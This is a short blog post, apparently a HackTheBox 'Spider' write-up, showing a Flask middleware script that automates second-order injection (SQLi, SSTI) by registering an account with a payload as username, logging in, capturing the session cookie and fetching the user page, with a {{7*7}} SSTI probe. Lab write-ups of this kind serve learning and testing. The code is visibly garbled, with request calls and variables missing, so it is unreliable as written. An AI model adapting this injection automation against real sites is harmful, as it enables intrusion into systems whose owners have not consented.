Creating simple middleware for easy exploitation of second order injections like SQLi, SSTI etc

  1. Checking the user registration page we have, username and password fields.
from flask import Flask
from flask import request
import uuid
import requests
import re
app = Flask(__name__)@app.route('/')
def index():
#Getting payload from attacker as a GET username parameter
post_data_reg={"username": uname,"confirm_username": uname,"password": "12345a","confirm_password": "12345a"}
#Creating a post data payload in json format
r1='http://spider.htb/register', data=post_data_reg)
#Sending Registration request
uuid = re.findall(r"[\w]{8}-[\w]{4}-[\w]{4}-[\w]{4}-[\w]{12}", r1.text)
#finding and filtering uuid in http response of registration using regular expression
#return r1.text
#Creating post data payload for login request
r2='http://spider.htb/login', data=post_data_login)
#Sending login request
#Filtering out session cookie required for user info request
custom_header = {"Cookie": cookie}
r3= requests.get('http://spider.htb/user', headers = custom_header)
#Sedning Get request to /user with user session cookie
return r3.text
#Sedning the http response of user info page back to browser'', port=81)
proxychains python3{{7*7}}



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Computer Security Enthusiast. Tries to understand how computers work. Would love to hear your suggestions and feedback.